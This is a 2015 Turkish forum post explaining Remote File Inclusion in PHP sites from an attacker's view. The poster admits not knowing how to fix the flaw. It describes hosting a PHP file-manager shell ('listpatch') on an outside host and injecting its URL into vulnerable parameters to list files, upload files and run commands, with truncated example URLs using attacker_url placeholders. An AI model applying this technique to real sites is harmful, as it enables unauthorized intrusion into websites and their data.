Toplam 1 adet sonuctan sayfa basi 1 ile 1 arasi kadar sonuc gösteriliyor
-
18.Ocak.2015, 17:24 #1
Remote File Inclusion Nedir?
PHP ile kodlanmış sistemlerde yapılan kodlama hataları, güvenlik açıklarına sebep olmaktadır. Bu güvenlik açıkları nedeniyle de sistem File Include ataklarına maruz kalmaktadır.
Açığın neden oluştuğu ve nasıl kapatalıcağı hakkında PHP bilmediğim için bilgi sahibi değilim.
Açıkdan örneklemek gerekirse, örnek bir açığın linki;
https://www.example.com/path_to_qnews.../attacker_url]
https://www.example.com/path_to_phpgr.../attacker_url]
https://www.example.com/PATH/admin/pl...mple.com/code]
Şekilde görüldüğü gibi bir kullanımları vardır. attacker_url veya example.com yazan yerlere kendi istediğimiz şeyleri yazarak siteye bazı şeyleri yaptırabiliyoruz. Örneğin dosya upload edebiliriz, bazı komutları çalıştırabiliriz (dizindeki dosyaları listeleme gibi) ya da uzaktan listpatch (ASP`deki FSO) çalıştırabiliriz. Asıl önemli nokta bu işte
Listpatch`i php destekleyen ama kodları compile etmeyen bir hosta atacağız. Yani kodlar attığımız hostta çalışırsa, include edeceğimiz hostta görevini görmeyecektir. https://hometown.aol.com/ buradan host alıp, PHP Listpatch`imizi içeriye atıyoruz.
https://hometown.aol.com/nickiniz/listpatch.php şeklinde hallettikten sonra, File Inc. açığı olan yerlerde çalıştırıyoruz.
Örneğin;
https://www.example.com/path_to_qnews.../attacker_url] burada id den sonraki yeri değiştiriyoruz. https://www.example.com/path_to_qnews.../listpatch.php şeklinde linki browser`a yazıp çalıştırdığımızda, sanki o siteye listpatch yedirmişiz gibi işlem yapabiliyoruz
Konu Bilgileri
Bu Konuya Gözatan Kullanıcılar
Şu anda 1 kullanıcı bu konuyu görüntülüyor. (0 kayıtlı ve 1 misafir)
Benzer Konular
-
LFI Local File İnclude (Kaliteli Döküman)
Konu Sahibi megatron Forum GüvenlikCevap: 0Son Mesaj : 18.Ocak.2015, 17:21 -
Remote File Inclusion Açık Kapatma
Konu Sahibi megatron Forum GüvenlikCevap: 0Son Mesaj : 18.Ocak.2015, 15:57 -
taktığım usb'leri file manager'dan göremiyorum.
Konu Sahibi deniz Forum Manjaro LinuxCevap: 0Son Mesaj : 20.Eylül.2014, 23:44 -
Tekil Çoğul Hit Nedir? Web Trafik Nedir? Neye Yarar?
Konu Sahibi WeBMasteR Forum AlexaCevap: 0Son Mesaj : 21.Mayıs.2014, 22:10
ForeverAutoHits Ücretsiz, Sınırsız...
25.Nisan.2024, 13:32 in Hit Kaynakları